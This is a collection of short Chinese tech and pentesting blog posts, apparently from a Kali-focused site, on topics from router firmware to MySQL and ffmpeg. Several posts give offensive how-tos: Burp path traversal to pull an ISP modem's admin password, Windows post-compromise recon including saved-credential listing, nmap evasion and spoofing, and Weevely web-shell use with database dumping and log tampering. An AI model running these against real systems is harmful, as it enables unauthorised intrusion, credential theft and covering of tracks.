  10. 什么是光猫的telecomadmin家庭的光猫一般有两个账号,一个为useradmin另外一个为telecomadmin。前者为普通用户,密码光猫后面的铭牌上面写着,用户登录即可。而后者为超级管理员密码,一般为电信工作人员所有。前者登录后仅仅为普通用户,权限少,而后者权限大,可“为所欲为”。准备U盘一个burpsuite聪明的大脑 开始破解1,首先配置burp 打开浏览器,设置代理方式 127.0.0.1:8080 2,运行burp 3,插入U盘,暂时关闭代理, 并用useradmin登录光猫 4,点击菜单栏储存管理-点击进入U盘目录 5,开启代理,并点击返回上一级 6,可以看到,已经返回了相关的路径信息,我们随便输入目录测试下。 7,将path值改为path=/ 可以看到,我们成功返回了根目录/下的所有文件。 8,找到光猫的备份文件一般是.xml文件,不同的型号位置可能不一样。 9,将备份文件复制到U盘,打开查找telecomadmin 顺利得到密码 10,登录测试 Telecomadmin能干什么配置ipv6网络我们首先用超级管理员登录光猫,配置信息如下! 登录路由器,配置联网方式 配置ipv6信息 测试是否成功 获取静态ip因地区限制或宽带业务因素,在本环境尚未成功,理论是可以获取的。但要根据具体实际而定。 其他方面正在研究。
  11. 之前,家中的路由器用的是小米的,用着用着感觉小米的路由器很是一般。打算入手华硕,由于自己平时不打游戏,所以没有买游戏路由器,感觉AC2200还可以,于是便入手了! 开箱视频 刷梅林固件我在梅林的下载页看了看,但是很遗憾,并没有AC2200的梅林固件。很是失落,但是通过查阅相关资料,发现AC2200和ACRH17的参数一样,并且两者的官方固件也是一样的。于是找到了ACRH17的梅林固件。并成功刷入成功。 1:点击系统设置-升级固件-选择固件 2:点击升级 3:完成升级 重启 4:原来的界面 显而易见,梅林固件的精彩之处在于,尽量保证原官方固件不变的情况下,加入了软件中心,我们可以安装各种插件。 官方固件搭建FRPRT-AC2200是基于amd的固件,很简单,我们以0.38为例,只需要配置下面几条命令即可。 cd /home #下载 wget --no-check-certificate https://bbskali.cn/frp_0.38.0_linux_arm.tar.gz #解压 tar -xzvf frp_0.38.0_linux_arm.tar.gz #文件夹名改成 frp,不然目录太长了不方便 mv frp_0.38.0_linux_arm frp cd frp #确保 frps 程序具有可执行权限 chmod +x frps配置客户端因为服务端我已经配置好了,具体配置可以查看我之前的文章。 [common] server_addr = 127.0.0.1 #服务器IP地址 server_port = 7000 #frp端口 token = 12345678 #frp密码 [ssh] type = tcp local_ip = 192.168.50.1 local_port = 22 #本地ssh端口 remote_port = 6000 #远程端口
  12. 从小白到黑阔,如何最直接的实现呢?如何才能使装逼最大化?要实现很简单,执行操作全部DOS化。让简单的移动复制操作通过DOS命令,瞬间高大上! Windows之所以能够在全球市场占据一定的地位,里不开其可视化操作。正是有了窗口的概念,才让普通人对电脑的操作更加普及。那么作为一名十分厉害的黑阔,不会点移动 复制的dos命令怎么可以呢? 文件操作目录切换:cd 切换到别的盘(例如D盘)d: 查看当前目录文件: dir(类似于linux下的ls命令) 创建文件夹 md 文件夹 删除文件夹 rd 文件夹 删除文件 del 文件 网络相关1 ping命令用法: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] | [-k host-list]] [-w timeout] [-R] [-S srcaddr] [-4] [-6] target_name 选项: -t Ping 指定的主机,直到停止。 若要查看统计信息并继续操作 - 请键入 Control-Break; 若要停止 - 请键入 Control-C。 -a 将地址解析成主机名。 -n count 要发送的回显请求数。 -l size 发送缓冲区大小。 -f 在数据包中设置“不分段”标志(仅适用于 IPv4)。 -i TTL 生存时间。 -v TOS 服务类型(仅适用于 IPv4。该设置已不赞成使用,且 对 IP 标头中的服务字段类型没有任何影响)。 -r count 记录计数跃点的路由(仅适用于 IPv4)。 -s count 计数跃点的时间戳(仅适用于 IPv4)。 -j host-list 与主机列表一起的松散源路由(仅适用于 IPv4)。 -k host-list 与主机列表一起的严格源路由(仅适用于 IPv4)。 -w timeout 等待每次回复的超时时间(毫秒)。 -R 同样使用路由标头测试反向路由(仅适用于 IPv6)。 -S srcaddr 要使用的源地址。 -4 强制使用 IPv4。 -6 强制使用 IPv6。示列: 检查网络是否连通 ping bbskali.cn 以每秒2000字节ping主机 ping -l 2000 -t bbskali.cn 2 tracert 路由追踪用法 用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] [-R] [-S srcaddr] [-4] [-6] target_name 选项: -d 不将地址解析成主机名。 -h maximum_hops 搜索目标的最大跃点数。 -j host-list 与主机列表一起的松散源路由(仅适用于 IPv4)。 -w timeout 等待每个回复的超时时间(以毫秒为单位)。 -R 跟踪往返行程路径(仅适用于 IPv6)。 -S srcaddr 要使用的源地址(仅适用于 IPv6)。 -4 强制使用 IPv4。 -6 强制使用 IPv6。示列: tracert bbskali.cn 3 ipconfig用法 ipconfig ... 显示信息 ipconfig /all ... 显示详细信息 ipconfig /renew ... 更新所有适配器 ipconfig /renew EL* ... 更新所有名称以 EL 开头 的连接 ipconfig /release *Con* ... 释放所有匹配的连接, 例如 "Local Area Connection 1" 或 "Local Area Connection 2" ipconfig /allcompartments ... 显示有关所有分段的 信息 ipconfig /allcompartments /all ... 显示有关所有分段的 详细信息示列 ipconfig 4 netstat显示协议统计和当前 TCP/IP 网络连接。 用法 NETSTAT [-a] [-b] [-e] [-f] [-n] [-o] [-p proto] [-r] [-s] [-t] [inte -a 显示所有连接和侦听端口。 -b 显示在创建每个连接或侦听端口时涉及的可执行程序。 在某些情况下,已知可执行程序承载多个独立的 组件,这些情况下,显示创建连接或侦听端口时涉 及的组件序列。此情况下,可执行程序的名称 位于底部[]中,它调用的组件位于顶部,直至达 到 TCP/IP。注意,此选项可能很耗时,并且在您没有 足够权限时可能失败。 -e 显示以太网统计。此选项可以与 -s 选项结合使用。 -f 显示外部地址的完全限定域名(FQDN)。 -n 以数字形式显示地址和端口号。 -o 显示拥有的与每个连接关联的进程 ID。 -p proto 显示 proto 指定的协议的连接;proto 可以是下列任 何一个: TCP、UDP、TCPv6 或 UDPv6。如果与 -s 选 项一起用来显示每个协议的统计,proto 可以是下列任 何一个: IP、IPv6、ICMP、ICMPv6、TCP、TCPv6、UDP 或 UDPv6。 -r 显示路由表。 -s 显示每个协议的统计。默认情况下,显示 IP、IPv6、ICMP、ICMPv6、TCP、TCPv6、UDP 和 UDPv6 的统计;-p 选项可用于指定默认的子网。 -t 显示当前连接卸载状态。 interval 重新显示选定的统计,各个显示间暂停的间隔秒数。 按 CTRL+C 停止重新显示统计。如果省略,则 netstat 将打印当前的配置信息一次。 示列 查看本机端口占用情况 netstat -ano 3 常用的快捷命令notepad 打开记事本 calc 打开计算器  mspaint 打开画图工具 write 打开写字板 winver 查看Windows版本 mstsc 打开远程桌面连接 gpedit.msc 打开组策略 regedit 打开注册表 services 打开服务管理 control 打开控制面版 Firewall.cpl Windows防火墙 wuapp Windows更新 logoff 注销命令 shutdown -s -t 60 表示60秒后自动关机 shutdown -a 取消定时关机
  13. 停电后,最折磨人的便是没有网了。笔记本有电池还能坚持下,可无论怎样,没网就可伶了。于是我们可以利用充电宝为光猫提供电源,实现没电后依旧能有网络。原理图 设备单充电宝(支持快充)诱骗器光猫电源 什么是诱骗器不论是QC充电器还是现在流行的PD充电器,内部都有协议芯片,所以要想让充电器输出快充电压,例如5V/9V/12V/15V/20V等,就需要在产品上加一个XSP06取电芯片,用这个协议芯片和充电器的协议芯片通讯,就可以输出需要的电压。诱骗器原理:通过USB数据口D+和D-,发送数据,模拟不同充电协议。从而诱导充电宝输出对应协议的输出电压。 经过尝试直接用充电宝输出电压—5V,这根本无法带动12v的光猫。 于是我们用诱骗器诱导充电宝输出12v电压(需充电宝支持12v输出) 利用诱导器诱导输出12v电压 成功启动光猫 后记这种方案,理论上支持所有12v-20v的直流用电器设备,如小米台灯,小米电风扇等设备。
  14. Burp Suite是一个用于测试网络应用程序安全性的图形化工具。该工具使用Java编写,由PortSwigger Web Security开发。 该工具有三个版本。可以免费下载的社区版、专业版和试用后可以购买的企业版。本文将全方位的讲解Burp的使用全过程,欢迎各位同仁提出独特的见解。 01Burp的启动我们可以再kali的菜单中,或者再终端执行burpsuite直接启动 02BURP的界面 03渗透第一步做好代理设置Burp的原理是,通过浏览器的代理,将浏览器的所有数据代理到brup中。再通过Burp对数据抓包,修改,放包最终达到所要的目的。 基于http的代理这里已kali自带的火狐浏览器为列,菜单-首选项-网络设置代理方式设置为手动代理IP和端口设置为127.0.0.1:8080 这样便完成了http的代理。 基于https的代理首先再浏览器中输入http://burp,点击右上角的CA Certificate下载证书 再浏览器中,导入下载的证书。 再浏览器代理中,勾选为所有协议使用相同代理服务器 重启浏览器后,便可以抓包了。 基于Android的代理相对而言,现在pc端用的比较少,而手机的用的比较多,那么能过用burp抓取手机的包吗? 首先确保手机和kali再同一个局域网,再通过ifconfig命令查看电脑端IP地址,然后再手机WiFi设置里面设置手机代理为电脑的IP 打开Burp Suite配置代理即可,IP为无线局域网的IP,端口设置为和手机端一致即可 配置burp打开burp,选择Proxy(代理)选项卡,会有四个子菜单,分别是intercept http history websockets history options 点击Options选项卡,配置burpd代理 04牛刀小试再浏览器打开我们的论坛 https://bbskali.cn 在Proxy下的intercept中便可以看到当前的抓包信息。 Target菜单在Target选项卡中有三个子菜单,分别是Site map Scope issue DEFINITIONS Site map站点地图,该模块是给用户展现,当前网站被打开后,访问了那些资源。以及各种详细的报文响应。 Scope 该选项是,在sitemap中没有出现的url或者path,我们可以手动去添加。一般不常用! issue definitions 该选项下会详细解释说明一些漏洞。如sql injection Proxy菜单Proxy(代理)选项卡在前面有所提到,会有四个子菜单,分别是intercept http history websockets history options intercept:显示当前抓获的数据包,有四个选项卡,具体作用如下: 选项作用Forward废弃当前 进入下一条Drop断开当前代理intercept is on /off打开 关闭代理Action功能相当于鼠标右键 更多功能 intruder 暴力破解模块这里我们以破解网站密码为列进行演示。 Pepeater在Burp中,可以利用Pepeater对数据包进行修改,然后进行发送。 使用示例: 我们已论坛发帖为列,首先编写帖子的标题和内容。 然后在burp中抓包 右键—send repeater 对帖子的内容进行修改,然后点击Send 在论坛中查看帖子,发现内容已修改。 SequencerBurp Sequencer是一种用于分析数据项的一个样本中的随机性质量的工具。你可以用它来测试应用程序的session tokens(会话tokens) Burp Sequencer主要由三个模块组成: Live capture 信息截取 Manual load 手动加载 Analysis options 选项分析 捕获令牌 Decoderburp Decoder是一个编码解码工具,可以将原始数据转换成各种编码 ComparerComparer是一个可视化的差异比较器,先是加载数据,然后分析差异。 extender从这个里面,我们可以加载burp的各种插件,也可以在BApp Store中去下载各种插件 END
  15. Mysql是最常见的关系数据库,因开源和免费被广泛使用。如果当我们数据库误删后,在没有备份的情况下如何恢复数据库呢? Mysql8.0数据库恢复环境Windows LinuxMysql8.0.12PHP7.4Dzx3.4 故障描述有网友联系我,说自己的dz站不小心删库了!本地没有备份,已经运维了好几年了。看能不能恢复,在咨询后发现他用的小皮面板,很显然没有做好备份功能!在查阅一番后,知道了自Mysql8.0后,当用户创建了数据库后,会在MySQL8.0.12\data目录下产生相应的恢复文档,用于后期的恢复!当然Mysql之前的版本也有这个功能,但是文件格式变了! 文件说明XXX.sdi表结构文件XXX.MYD数据文件XXX.MYI索引文件我们可以利用这三个文件完成对数据库的恢复! 删库恢复测试1.我们首先创建一个数据库bbskali create database bbskali;2.创建数据表 并建立相应的字段 CREATE TABLE `bbskali`.`nbkali` ( `id` INT(255) NOT NULL , `name` CHAR(255) NOT NULL , `nmuber` INT(255) NOT NULL , `age` INT(255) NOT NULL ) ENGINE = MyISAM; 3.删除数据库 4.我们在date目录下可以看到刚才建立的数据库bbskali的文件夹,以及有关表的相关文件。 5.将文件复制出来,并新建数据库bbskali2和表nbkali(建立字段,不填数值。) 6.继续会到date目录,会有下面结构。 前后对比,我们发现只有.sdi文件名不一样。先把旧表数据.MYD .MYI替换新表.MYD .MYI,然后将新表的.sdi给旧表重命名后替换! 7.重启数据库,就可以看到数据已恢复! Dz3.4删库恢复基于上面的恢复策略,我们可以去恢复误删的dz的数据库。 但因为dz表比较多,站点数据较大等因素,一个个新建表去恢复不现实! 解决思路如下: 1.重装dz论坛系统,我们我们就得到了dz的表结构。 2.复制原站的date目录,将里面MYD和MYI全部替换,然后去找对应的.sdi文件,将其重命名后在替换。 3.重启数据库 弊端1.当数据表较多时,不建议用此方法,除非迫不得已! 2.不能恢复dz插件的数据,因为没有插件的.sdi 的文件信息 3.对于dz我们可以只恢复用户表和帖子表即可!其他的我们可在后台再次设置!以下是dz部分表的信息! 用户表信息: 表名说明pre_common_member帖子用户表pre_ucenter_membersuc用户表pre_ucenter_memberfields用户id表帖子信息表 表名说明pre_forum_post帖子文章表pre_forum_thread帖子内容pre_forum_threadimage帖子图片
  16. 平时在使用Linux学习或者编辑时,总离不开文件的编辑。不像Windows哪样,有各种各样的编辑器。那么我们在Linux环境中常用那些编辑器呢? 01 VimVim是从 vi 发展出来的一个文本编辑器。代码补完、编译及错误跳转等方便编程的功能特别丰富,在程序员中被广泛使用。 使用教程基本上 vi/vim 共分为三种模式,分别是命令模式,输入模式和底线命令模式。 命令模式: 此状态下敲击键盘动作会被Vim识别为命令,而非输入字符。比如我们此时按下i,并不会输入一个字符,i被当作了一个命令。 常用的几个命令: 命令释义i切换到输入模式,以输入字符。x删除当前光标所在处的字符。:切换到底线命令模式输入模式 在命令模式下按下i就进入了输入模式。 按键释义ENTER回车键,换行BACK SPACE删除光标前一个字符DEL删除光标后一个字符方向键在文本中移动光标HOME/END移动光标到行首/行尾Insert切换光标为输入/替换模式,光标将变成竖线/下划线ESC退出输入模式,切换到命令模式底线命令模式 在命令模式下按下:(英文冒号)就进入了底线命令模式。 按键释义:q退出程序:w保存文件:wq保存并退出vim键盘图 基本实例创建文本 vim bbskali.txt这样我们便创建了名为bbskali.txt的文档,当然可以创建所有的文本格式,如php jsp doc bat html都行。 输入i进入输入\编辑模式 然后输入我们想要的内容,然后按:退出编辑模式,输入wq保存并关闭文件。 高级功能搜索替换 按键释义/p向光标之下寻找一个名称为 p 的字符串?p向光标之上寻找一个字符串名称为 p 的字符串可以通过英文按键n。重复前一个搜寻的动作 替换 语法格式:n1,n2s/p/p2/g n1 与 n2 为数字。在第 n1 与 n2 行之间寻找 p 这个字符串,并将该字符串取代为 p2 示列 100 到 200 行之间搜寻 p 并取代为 p2 :100,200s/p/p2/g从第一行到最后一行寻找 p 字符串,并将该字符串取代为 p2 !(常用) :1,$s/p/p2/g删除 复制 粘贴按键释义dd删除游标所在的那一整行(常用)nddn 为数字。删除光标所在的向下 n 行yy复制游标所在的那一行(常用)nyyn 为数字。复制光标所在的向下 n 行,例如 20yy 则是复制 20 行(常用)p, Pp 为将已复制的数据在光标下一行贴上,P 则为贴在游标上一行02 nano相对于vim, nano 几乎是零学习成本。nano 的用户体验完全吊打 Vim。 语法 nano <文件名或文件绝对路径>使用示例 nano /root/bbskali.txt当你打开一个不存在的文件,那么即为新建文件。 打开文件后,就可以直接编辑了。 各种功能键说明: 按键释义Ctrl+G显示帮助文本Ctrl+O保存当前文件Ctrl+R读取其他文件Ctrl+K剪切Ctrl+U粘贴Ctrl+W搜索Ctrl+X退出
  17. 网线里面的8芯线是由4对不同颜色对绞在一起的传输线组成的,所以也被称为双绞线。相信你也会好奇,为何要扭绞在一起呢。这样做的目的是改变线缆原有的电子特性,抵御外界电磁干扰,降低自身信号串扰,可以达到一个最佳的传输效果。那么网线里8芯线各自作用是什么: ① 输出数据 (+) ② 输出数据 (-) ③ 输入数据 (+) ④ 保留网络传输 ⑤ 保留网络传输 ⑥ 输入数据 (-) ⑦ 保留网络传输 ⑧ 保留网络传输 所以从上面就可以看出,1和2是用来发送数据,3和6是用来接收数据的。
  18. 第一次玩红警还是高中的时候,记得和同学一起通宵玩游戏。玩着穿越火线,看着电视剧《神话》,在无聊中随机打开了红警。被红警的玩法深深的吸引了我。如今快十年过去了,而我也成为了油腻男,青春的岁月也不复存在。那些陪我玩游戏的伙伴也早已成家立业!
  19. Mysql是著名的关系数据库,因其性能稳定,免费而广而人知。现对其基础语法做简单的总结! 登录数据库mysql -u root -p nter password:****** # 登录后进入终端创建数据库create DATABASE bbskali;drop 命令删除数据库drop 命令格式: drop database <数据库名>; 例如删除名为 bbskali 的数据库: drop database bbskali;创建数据表创建MySQL数据表需要以下信息: 表名表字段名定义每个表字段 语法 以下为创建MySQL数据表的SQL通用语法: CREATE TABLE table_name 以下例子中我们将在kali 数据库中创建数据表xiao_tbl: CREATE TABLE `xiao_tb1`( `id` INT UNSIGNED AUTO_INCREMENT, `name` VARCHAR(100) NOT NULL, `number` VARCHAR(40) NOT NULL, `submission_date` DATE, PRIMARY KEY ( `id` ) )ENGINE=InnoDB DEFAULT CHARSET=utf8;实例解析: 如果你不想字段为 NULL 可以设置字段的属性为 NOT NULL, 在操作数据库时如果输入该字段的数据为NULL ,就会报错。 AUTO_INCREMENT定义列为自增的属性,一般用于主键,数值会自动加1。 PRIMARY KEY关键字用于定义列为主键。 您可以使用多列来定义主键,列间以逗号分隔。 ENGINE 设置存储引擎,CHARSET 设置编码。 删除MySQL数据表DROP TABLE table_name ;插入数据INSERT INTO table_name ( id, name,number ) VALUES ( 666, 逍遥子,NB110 );读取数据表select * from kali_tbl;更新表UPDATE kali_tbl SET name='牛逼闪闪' WHERE id=3;删除数据DELETE FROM kali_tbl WHERE id=3;LIKE语句将 kali_tbl 表中获取 name 字段中以 COM 为结尾的的所有记录: SELECT * from kali_tbl WHERE name LIKE '%COM';导出数据库mysqldump -u root -p root xiao > dump.sql导入数据库mysql -u root -p 123456 < dump.sql
  20. 前言ffmpeg是一个非常强大的视频处理工具,它可以转换任何格式的媒体文件,并且还可以用自己的AudioFilter以及VideoFilter进行处理和编辑。并且支持多平台安装比较简单,适用于处理各种视频文件。 安装本文主要讲解在Linux下的使用,因此在Linux中安装执行下面命令即可。 apt-get install ffmpeg 常用示例直接将MP4文件转成m3u8: ffmpeg -i bbskali.mp4 -hls_time 10 -hls_list_size 0 -hls_segment_filename ene_%05d.ts bbskali.m3u8如果已经是ts文件了,则只需要执行下方命令即可: ffmpeg -i bbskali.ts -c copy -map 0 -f segment -segment_list playlist.m3u8 -segment_time 10 output%03d.ts将大量分割成ts文件的视频片段全部转换成mp4视频片段 --- 直接上批处理脚本: for %%a in ("D:\VideoProjects\NewDemo\*.ts") do ffmpeg -i "%%a" -vcodec copy -vcodec copy -f mp4 "D:\VideoProjects\NewDemo\NewMP4\%%~na.mp4" pause上面的 ffmpeg -i test.ts -acodec copy -vcodec copy -f mp4 test.mp4 是将ts文件转换为mp4文件的意思,再在其之上套了一层for循环,%%a就是每个文件,转换命令最末尾的%%~na是将文件保持原来的文件名的情况下进行输出,存放到指定文件夹的意思。 mp4视频转flv ffmpeg -i bbskali.mp4 -acodec copy -vcodec copy -f flv bbskali.flv 将本地指定的demo.ts文件进行推流: ffmpeg -re -i demo.ts -c copy -f mpegts udp://127.0.0.1:1997强制把输出视频文件帧率改为 24 fps: ffmpeg -i bbskali.avi -r 24 output.avi对视频每个一秒截一个图并存在本地: ffmpeg -i bbskali.mp4 -f image2 -vf fps=fps=1 out%d.png每隔20秒截一个图: ffmpeg -i bbskali.mp4 -f image2 -vf fps=fps=1/20 out%d.png将视频转换为图片,一帧一图: ffmpeg -i bbskali.mp4 out%4d.png提取视频文件中的音频数据,并保存为文件 ffmpeg -i bbskali.mp4 -vn -acodec copy output.m4a给视频添加水印 ffmpeg -i pm.mp4 -i xxx.png -filter_complex "overlay=5:5" out.mp4把视频的前30帧转换成一个Animated Gif ffmpeg -i test.asf -vframes 30 -y -f gif a.gif截取指定时间的缩微图 ffmpeg -i test.avi -y -f image2 -ss 8 -t 0.001 -s 350x240 test.jpg将一段音频与一段视频混合 ffmpeg -i son.wav -i video_origine.avi video_finale.mpg使用ffmpeg录像屏幕 ffmpeg -vcodec mpeg4 -b 1000 -r 10 -g 300 -vd x11:0,0 -s 1024x768 ~/test.avi其中,-vd x11:0,0 指录制所使用的偏移为 x=0 和 y=0,-s 1024×768 指录制视频的大小为 1024×768。录制的视频文件为 test.avi,将保存到用户主目录中 如果你只想录制一个应用程序窗口或者桌面上的一个固定区域,那么可以指定偏移位置和区域大小。使用xwininfo -frame命令可以完成查找上述参数。 重新调整视频尺寸大小 ffmpeg -vcodec mpeg4 -b 1000 -r 10 -g 300 -i ~/test.avi -s 800×600 ~/test-800-600.avi把摄像头的实时视频录制下来,存储为文件 ffmpeg -f video4linux -s 320*240 -r 10 -i /dev/video0 test.asf注:ffmpeg的屏幕录制功能只能在Linux环境下有效。
  21. “渗透测试的本质即信息收集”,通过收集各种信息,以便我们获取目标的相关信息。本文将解讲解在Windows下常用的收集命令。 查看当前用户及权限whoami 查看系统信息以及补丁情况,是否有域systeminfo 查看账号相关信息hostname # 查看当前主机名 net user # 查看主机账号,为定制字典准备 quser # 查看在线用户,注意管理员是否在线 查看当前保存的登陆凭证cmdkey /l 查看网络连接状态netstat -nao 查看arp通信记录arp -a 查看路由表route print 查看打开文件的记录dir %APPDATA%\Microsoft\Windows\Recent
  22. 一、前言:Nmap是一个非常实用的网络连接端扫描软件,适用于Linux、Windows、Mac三大主流平台。用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。 二、主机发现:1.全面扫描/综合扫描 nmap -A 192.168.242.1 2.Ping扫描 nmap -sP 192.168.242.1/243.免ping扫描,穿透防火墙,避免被防火墙发现 nmap -P0 192.168.242.14.TCP SYN Ping扫描 nmap -PS -v 192.168.242.135nmap -PS80()端口,10-100 -v 192.168.242.135 (针对防火墙丢弃RST包) 5.TCP ACK Ping 扫描 nmap -PA -v 192.168.242.135UDP Ping 扫描 nmap -PU -v 192.168.242.135ICMP Ping Types 扫描 nmap -PU -v 192.168.242.135 (ICMP ECHO) nmap -PP -v 192.168.242.135 (ICMP 时间戳) nmap -PM -v 192.168.242.135 (ICMP 地址掩码)ARP Ping 扫描 nmap -PR -v 192.168.242.1列表扫描 nmap -sL -v 192.168.242.110.禁止方向域名解析 nmap -n -sL -v 192.168.242.1方向域名解析 nmap -R -sL -v 192.168.242.1使用系统域名解析系统 nmap --system-dns 192.168.242.1 192.168.242.135扫描IPV6 地址 nmap -6 IPv6路由跟踪 nmap --traceroute -v www.sunbridgegroup.comSCTP INIT Ping 扫描 nmap -PY -v 192.168.1.103三、端口扫描时序扫描 nmap -T(0-5) 192.168.242.1常用扫描方式 nmap -P 80 192.168.242.1 nmap -P 80-100 192.168.242.1 nmap -P T:80,U:445 192.168.242.135 nmap -F 192.168.242.135 (快速扫描) nmap --top-ports 200 192.168.242.1 (扫描最有用的前200 个端口)TCP SYN 扫描(高效的扫描方式) nmap -sS -v 192.168.242.135TCP 连接扫描 nmap -sT -v 192.168.242.1UDP 连接扫描 nmap -sU -p 80-100 192.168.242.135隐蔽扫描 nmap -sN 61.241.194.153(NULL 扫描) nmap -sF 61.241.194.153(FIN 扫描) nmap -sX 61.241.194.153(Xmas 扫描)TCP ACK 扫描 nmap -sA 192.168.242.1TCP 窗口扫描 nmap -sW -v -F 192.168.242.1TCP Maimon 扫描 nmap -sM -T4 192.168.242.135自定义扫描 nmap -sT --scanflags SYNURG 192.168.242.1空闲扫描( 隐藏IP ) nmap -sI www.0day.co:80 192.168.242.1IP 协议扫描 nmap -sO -T4 192.168.242.1四、指纹识别与探测版本探测 nmap -sV 192.168.242.135nmap -sV -A 192.168.241.135全端口版本探测 nmap -sV --allports 192.168.242.135设置扫描强度 nmap -sV --version-intensity (0-9) 192.168.242.135轻量级扫描 nmap -sV --version-light 2 192.168.242.135重量级扫描 nmap -sV --version-all 192.168.242.135获取详细版本信息 nmap -sV --version-trace 192.168.242.135RPC 扫描 nmap -sS -sR 192.168.242.135对指定的目标进行操作系统监测 nmap -O --osscan-limit 192.168.242.1推测系统并识别 nmap -O --osscan-guess 192.168.242.1五、伺机而动调整并行扫描组的大小 nmap --min-hostgroup 30 192.168.242.1/24 nmap --max-hostgroup 30 902 192.168.242.1调整探测报文的并行度 nmap --min-parallelism 100 192.168.242.1 nmap --max-parallelism 100 192.168.242.1调整探测报文超时 nmap --initial-rtt-timeout 100ms 192.168.242.1 nmap --max-rtt-timeout 100ms 192.168.242.1 nmap --min-rtt-timeout 100ms 192.168.242.1放弃缓慢的目标主机 nmap --host-timeout 1800000ms 192.168.242.1调整报文适合时间间隔 nmap --scan-delay 1s 192.168.242.1 nmap --max-scan-delay 1s 192.168.242.1六、防火墙/IDS 逃逸报文分段 nmap -f -v 61.241.194.153指定偏移大小 nmap --mtu 16 192.168.242.1IP 欺骗 nmap -D RND:11 192.168.1.104 nmap -D 192.168.1.104,192.168.1.103,192.168.1.101 192.168.1.104源地址欺骗 nmap -sI www.0day.cn:80 192.168.1.104源端口欺骗 nmap --source-port 902 192.168.1.104指定发包长度 nmap --data-length 30 192.168.1.104目标主机随机排序 nmap --randomize-hosts 192.168.1.104MAX 地址欺骗 nmap -sT -Pn --spoof-mac 0 192.168.1.104七、信息收集IP 信息收集 nmap --script ip-geolocation-* www.bbskali.cnWHOIS 查询 nmap --script whois-domain www.pcos.cn nmap --script whois-domain --script-args whois.whodb=nofollow www.ithome.com nmap -sn --script whois-domain -v -iL host.txtIP 反查 nmap -sn --script hostmap-ip2hosts www.bbskali.cnDNS 信息收集 nmap --script dns-brute www.bbskali.cn nmap --script dns-brute dns-brute.threads=10 www.bbskali.cn nmap --script dns-brute dns-brute.threads=10,dns-brute.hostlis www.bbskali.cn检索系统信息 nmap -p 445 445 192.168.1.104 --script membase-http-info后台打印机服务漏洞 nmap --script smb-security-mode.nse -p 445 119.29.155.45系统漏洞扫描 nmap --script smb-check-vulns.nse -p 445 119.29.155.459.扫描Web 漏洞 nmap -p80 --script http-stored-xss.nse/http-sql-injection.nse 119.29.155.45通过Snmp 列举Windows 服务/账户 nmap -sU -p 161 --script=snmp-win32-services 192.168.1.104 nmap -sU -f -p 161 --script=snmp-win32-users 192.168.1.110枚举DNS 服务器的主机名 nmap --script dns-brute --script-args dns-brute.domain=baidu.comHTTP 信息收集 nmap -sV -p 80 www.0day.com (HTTP 版本探测) nmap -p 80 --script=http-headers www.pcos.cn (HTTP 信息头探测) nmap -p 80 --script=http-sitemap-generator www.pcos.cn (爬行Web 目录结构)枚举SSL 密钥 nmap -p 443 --script=ssl-enum-ciphers www.baidu.comSSH 服务密钥信息探测 nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 127.0.0.1
  23. 利用nmap可以生成我们对目标主机的扫描结果。但是nmap自带的样式并不是很美观。生成报告nmap -T4 -A 192.168.1.1/24 -oX bbskali.xml注意:生成的报告格式为xml 下载文末的附件下载完成后放到/usr/share/nmap替换原来的nmap.xsl 格式转换为了更好的阅读,我们需将xsl文件转换为html 执行命令: xsltproc -o nmap报告.htm bbskali.xml注:bbskali.xml就是我们上步生成的报告 附件下载nmap.xsl 在线体验Nmap扫描报告美化
  24. 本文将利用python调用nmap完成扫描,并将扫描结果通过表格的方式展示出来。以便扫描者更加清晰明了的观察扫描结果。 实验环境Python3nmap7.9 代码如下:#!/usr/bin/env pthon #--*--coding=utf-8--*-- #kali blog(https://blog.bbskali.cn) #逍遥子大表哥 import os from terminaltables import AsciiTable gateway = input('YOU IP Address:') print ("\033[31m稍等 正在扫描\033[0m") print ("当前网关变量为:",gateway) def scan(): scan = os.popen("nmap " + gateway + " -n -P").read() f = open('scan.txt','w') f.write(scan) f.close() devices = os.popen(" grep report scan.txt | awk '{print $5}' ").read() devices_mac = os.popen("grep MAC scan.txt | awk '{print $3}'").read() + os.popen("ip addr | grep 'state UP' -A1 | tail -n1 | awk '{print $2}' | cut -f1 -d'/' ").read().upper() # get devices mac and localhost mac address devices_name = os.popen("grep MAC scan.txt | awk '{print $4 ,S$5 $6}'").read() + "\033[1;32m(本机)\033[1;m" port = os.popen(" grep tcp scan.txt -A 0 | awk '{print $1,$2}' | cut -f1 -d'/' ").read() table_data = [ ['IP Address', 'Mac Address', 'Manufacturer','port'], [devices, devices_mac, devices_name,port] ] table = AsciiTable(table_data) print(table.table) os.popen("rm -f scan.txt") if __name__ == '__main__': scan()扫描结果 视频演示
  25. Weevely是一个专门为web渗透攻击设计的web shell,由于是用python语言编写的工具,因此支持跨平台可以 任何有python环境的系统上使用。和Windows系统中一款类似的工具(中国菜刀)一样。 安装更新在kali中已经默认安装了weevely 其他类似系统安装执行下面命令即可。 apt-get install weevely -y基础用法生成web shell格式如下: weevely generate <shell密码> <生成目录> 示例: weevely generate 8888 /root/88.php 连接web shell我们需将生成的web shell上传到目标服务器。这里不在详解,需要的伙伴可以阅读博客中类似的文章。 格式如下: weevely <URL> <password> [cmd] 示例: weevely http://192.168.1.2/88.php 8888 查看系统信息所需命令system_info 枚举用户文件枚举用户目录下且有权限的文件,也可用来加载字典。这里我们可以通过:audit_ filesystem ,来查看都支 持搜索哪些类型的用户文件。 查看PHP配置文件所需命令audit_phpconf 高级用法系统提权连接数据库sql_console sql_console -u root -p 12345678 对数据库进行脱裤所需命令:sql_dump sql_dump -dbms mysql tianyuan root 12345678 文件操作当获取到目标系统的weevely shell后,我们通过help可以查看文件相关的模块。通过这些文件操作模块,可以 对目标服务器进行文件的打包、上传、 下载、删除、在线修改、复制,还可以通过HTTPfs挂在远程文件系统。通 过这些操作,不仅可以修改目标服务器上的源代码,还可以清除或修改我们的操作日志。比如将access log中有关 攻击机IP地址的信息删除,或者算改日志中的时间戳等等。 子网扫描所需命令:net_scan 示例: net_scan 192.168.1.1/24 80,3306 -print 更多好玩,请看help命令。